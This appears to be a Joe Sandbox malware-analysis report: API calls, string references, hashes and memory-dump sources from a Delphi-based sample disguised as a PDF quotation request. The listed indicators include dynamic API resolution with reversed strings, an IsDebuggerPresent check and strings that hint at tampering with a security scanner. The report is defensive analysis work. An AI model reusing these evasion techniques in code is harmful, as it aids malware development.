                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Eventtime
                                                                  • String ID:
                                                                  • API String ID: 2982266575-0
                                                                  • Opcode ID: cb288c827e4e71e96ac613c255f16affbb1ba2127e4d8a8c3dcfe10bf149dec9
                                                                  • Instruction ID: 6aff6933e83628a174d8833bec3bd1690d135b34998949e2c9f21ee92d08b7f9
                                                                  • Opcode Fuzzy Hash: cb288c827e4e71e96ac613c255f16affbb1ba2127e4d8a8c3dcfe10bf149dec9
                                                                  • Instruction Fuzzy Hash: 3EC092F0B903003EF62096A85CD2F2362CDE748B04F600816BF00EE2D1DAE288601A28
                                                                  APIs
                                                                  • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02954BEB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AllocString
                                                                  • String ID:
                                                                  • API String ID: 2525500382-0
                                                                  APIs
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02954C03
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FreeString
                                                                  • String ID:
                                                                  • API String ID: 3341692771-0
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02952000), ref: 029516A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02951704
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0296ABE3,?,?,0296AC75,00000000,0296AD51), ref: 0296A970
                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0296A988
                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0296A99A
                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0296A9AC
                                                                  • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0296A9BE
                                                                  • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0296A9D0
                                                                  • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0296A9E2
                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0296A9F4
                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0296AA06
                                                                  • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0296AA18
                                                                  • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0296AA2A
                                                                  • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0296AA3C
                                                                  • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0296AA4E
                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0296AA60
                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0296AA72
                                                                  • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0296AA84
                                                                  • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0296AA96
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                  • API String ID: 667068680-597814768
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,02956BD0,02950000,0297D790), ref: 029558D1
                                                                  • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 029558E8
                                                                  • lstrcpynA.KERNEL32(?,?,?), ref: 02955918
                                                                  • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02956BD0,02950000,0297D790), ref: 0295597C
                                                                  • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02956BD0,02950000,0297D790), ref: 029559B2
                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02956BD0,02950000,0297D790), ref: 029559C5
                                                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02956BD0,02950000,0297D790), ref: 029559D7
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02956BD0,02950000,0297D790), ref: 029559E3
                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02956BD0,02950000), ref: 02955A17
                                                                  • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02956BD0), ref: 02955A23
                                                                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02955A45
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                  • API String ID: 3245196872-1565342463
                                                                  APIs
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02955B94
                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02955BA1
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02955BA7
                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02955BD2
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02955C19
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02955C29
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02955C51
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02955C61
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02955C87
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02955C97
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                  • API String ID: 1599918012-2375825460
                                                                  APIs
                                                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02957F7D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: DiskFreeSpace
                                                                  • String ID:
                                                                  • API String ID: 1705453755-0
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0295A76A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  APIs
                                                                  • GetVersionExA.KERNEL32(?,0297C106,00000000,0297C11E), ref: 0295B722
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Version
                                                                  • String ID:
                                                                  • API String ID: 1889659487-0
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0295BDFA,00000000,0295C013,?,?,00000000,00000000), ref: 0295A7AB
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                                  • Instruction ID: 574d4c8e746b78294706f463e0da806ad816d401f1704704356bd8537b697de9
                                                                  • Opcode Fuzzy Hash: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                                  • Instruction Fuzzy Hash: FBD05EA630E2742AA220915A2D94D7B5AECCAC97A1F00853EF948C6200E2108C0697B5
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: LocalTime
                                                                  • String ID:
                                                                  • API String ID: 481472006-0
                                                                  • Opcode ID: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                                  • Instruction ID: 4491f48180c7c410c1aec477f0d983383f2554924af38daac1ed1cea268e7082
                                                                  • Opcode Fuzzy Hash: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                                  • Instruction Fuzzy Hash: A8A0110080A830028A803B280C0223A3088A880B20FC80F80ACF8802E0EE2E022082E3
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                  • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                  • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                  • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0295D225
                                                                    • Part of subcall function 0295D1F0: GetProcAddress.KERNEL32(00000000), ref: 0295D209
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                  • API String ID: 1646373207-1918263038
                                                                  • Opcode ID: dd39941c5aed80b2aebdb94ed9797d4b5abb59162ff8be8ef517098d8a09a088
                                                                  • Instruction ID: 723ec46efe16037a72cc0c642af0732ff9d718f56999d2893de2d5b989331be4
                                                                  • Opcode Fuzzy Hash: dd39941c5aed80b2aebdb94ed9797d4b5abb59162ff8be8ef517098d8a09a088
                                                                  • Instruction Fuzzy Hash: BC414F61F893655B560DEB7E751053B7BEADA887107A0441ABC0CCA785DE20BC918F3E
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02966E66
                                                                  • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02966E77
                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02966E87
                                                                  • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02966E97
                                                                  • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02966EA7
                                                                  • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02966EB7
                                                                  • GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 02966EC7
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                  • API String ID: 667068680-2233174745
                                                                  • Opcode ID: ec47aae98e83a4eccecfd8604435dbac74c4392bd0cb16bd234324e5de52e877
                                                                  • Instruction ID: e7d4105ba8f7ef25943f4b1fe01ed5adc2b4451e98698d77501b06df9f2be084
                                                                  • Opcode Fuzzy Hash: ec47aae98e83a4eccecfd8604435dbac74c4392bd0cb16bd234324e5de52e877
                                                                  • Instruction Fuzzy Hash: 22F050B2B8E3316EB705FFB09CC6C3727DDAED06457401939780265542EBBD88244F60
                                                                  APIs
                                                                  • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029528CE
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Message
                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                  • API String ID: 2030045667-32948583
                                                                  • Opcode ID: 8dce429ba7246632b61e4608c35f2c5222f8181f7fc4b93d38d00b28144abb7a
                                                                  • Instruction ID: 09b1c84884e13386d1b800bab482e353da83e0619733e85aaa606a1be2faf721
                                                                  • Opcode Fuzzy Hash: 8dce429ba7246632b61e4608c35f2c5222f8181f7fc4b93d38d00b28144abb7a
                                                                  • Instruction Fuzzy Hash: 98A1BF30F043B48BDB21EB2CCC84B99BBE9EB49750F1440E5ED49AB285CB759986CF51
                                                                  Strings
                                                                  • An unexpected memory leak has occurred. , xrefs: 02952690
                                                                  • The unexpected small block leaks are:, xrefs: 02952707
                                                                  • Unexpected Memory Leak, xrefs: 029528C0
                                                                  • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02952849
                                                                  • bytes: , xrefs: 0295275D
                                                                  • , xrefs: 02952814
                                                                  • 7, xrefs: 029526A1
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                  • API String ID: 0-2723507874
                                                                  • Opcode ID: 63526ab202f36068188c7e8cef3e2ecae3e6281cbf5e797c75c01fcd57edf2ee
                                                                  • Instruction ID: 93cf96a7f60e5831386792c9dd454a8ca3cef982651a10ae1803e8b81ecaf015
                                                                  • Opcode Fuzzy Hash: 63526ab202f36068188c7e8cef3e2ecae3e6281cbf5e797c75c01fcd57edf2ee
                                                                  • Instruction Fuzzy Hash: C571AF30F042B88BDB21DB2CCC84B99BBE9EB49754F1040E5DD49AB281DB759A85CF51
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(00000000,0295C013,?,?,00000000,00000000), ref: 0295BD7E
                                                                    • Part of subcall function 0295A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0295A76A
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread
                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                  • API String ID: 4232894706-2493093252
                                                                  • Opcode ID: b1e2c42f11713df48e61f4bd65f96e745ab6381cfc4cbb95501f2fc7e6335928
                                                                  • Instruction ID: 0031f7cb941c775a4a46203eae8356864eabaf324284a1a06b48aa363f0a5f33
                                                                  • Opcode Fuzzy Hash: b1e2c42f11713df48e61f4bd65f96e745ab6381cfc4cbb95501f2fc7e6335928
                                                                  • Instruction Fuzzy Hash: EE615E34B003689BDF01EBB4D890ADFB7FB9FC9300F509536A905AB245DA35DA068B94
                                                                  APIs
                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 0296AE40
                                                                  • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0296AE57
                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 0296AEEB
                                                                  • IsBadReadPtr.KERNEL32(?,00000002), ref: 0296AEF7
                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 0296AF0B
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Read$HandleModule
                                                                  • String ID: KernelBase$LoadLibraryExA
                                                                  • API String ID: 2226866862-113032527
                                                                  • Opcode ID: b19132c60bc44d1ba06cf54a9292ff5b35dbbd87a415786b15e8cde47d1d15a2
                                                                  • Instruction ID: 5962bd194a30b1e3396858631253f84db0135341a4d2086b3c5686d133d404af
                                                                  • Opcode Fuzzy Hash: b19132c60bc44d1ba06cf54a9292ff5b35dbbd87a415786b15e8cde47d1d15a2
                                                                  • Instruction Fuzzy Hash: B73143B2A40305BFDB10DFA8CC89FBD77ECAF45364F444564EA54BB280D370A9509BA5
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029543F3,?,?,029B07C8,?,?,0297D7A8,0295655D,0297C30D), ref: 02954365
                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029543F3,?,?,029B07C8,?,?,0297D7A8,0295655D,0297C30D), ref: 0295436B
                                                                  • GetStdHandle.KERNEL32(000000F5,029543B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029543F3,?,?,029B07C8), ref: 02954380
                                                                  • WriteFile.KERNEL32(00000000,000000F5,029543B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029543F3,?,?), ref: 02954386
                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 029543A4
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: FileHandleWrite$Message
                                                                  • String ID: Error$Runtime error at 00000000
                                                                  • API String ID: 1570097196-2970929446
                                                                  APIs
                                                                    • Part of subcall function 0295ACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0295ACE1
                                                                    • Part of subcall function 0295ACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0295AD05
                                                                    • Part of subcall function 0295ACC4: GetModuleFileNameA.KERNEL32(02950000,?,00000105), ref: 0295AD20
                                                                    • Part of subcall function 0295ACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0295ADB6
                                                                  • CharToOemA.USER32(?,?), ref: 0295AE83
                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0295AEA0
                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0295AEA6
                                                                  • GetStdHandle.KERNEL32(000000F4,0295AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0295AEBB
                                                                  • WriteFile.KERNEL32(00000000,000000F4,0295AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0295AEC1
                                                                  • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0295AEE3
                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0295AEF9
                                                                  Similarity
                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                  • String ID:
                                                                  • API String ID: 185507032-0
                                                                  APIs
                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0295E5AD
                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0295E5C9
                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0295E602
                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0295E67F
                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0295E698
                                                                  • VariantCopy.OLEAUT32(?,00000000), ref: 0295E6CD
                                                                  Similarity
                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                  • String ID:
                                                                  • API String ID: 351091851-0
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0295358A
                                                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029535D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029535BD
                                                                  • RegCloseKey.ADVAPI32(?,029535E0,00000000,?,00000004,00000000,029535D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029535D3
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                  • API String ID: 3677997916-4173385793
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                  • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                  • GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: Kernel32$sserddAcorPteG
                                                                  • API String ID: 667068680-1372893251
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(?,00000000,0295AA6F,?,?,00000000), ref: 0295A9F0
                                                                    • Part of subcall function 0295A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0295A76A
                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0295AA6F,?,?,00000000), ref: 0295AA20
                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 0295AA2B
                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0295AA6F,?,?,00000000), ref: 0295AA49
                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 0295AA54
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                  • String ID:
                                                                  • API String ID: 4102113445-0
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(?,00000000,0295AC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0295AAB7
                                                                    • Part of subcall function 0295A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0295A76A
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread
                                                                  • String ID: eeee$ggg$yyyy
                                                                  • API String ID: 4232894706-1253427255
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc
                                                                  • String ID: AeldnaHeludoMteG$KernelBASE
                                                                  • API String ID: 1883125708-1952140341
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KernelBase,?,0296EF98,UacInitialize,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,ScanString,029B137C,0297AFD8,Initialize), ref: 0296EB9A
                                                                  • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0296EBAC
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: IsDebuggerPresent$KernelBase
                                                                  • API String ID: 1646373207-2367923768
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0297C10B,00000000,0297C11E), ref: 0295C402
                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0295C413
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                  • API String ID: 1646373207-3712701948
                                                                  APIs
                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0295E21F
                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0295E23B
                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0295E2B2
                                                                  • VariantClear.OLEAUT32(?), ref: 0295E2DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
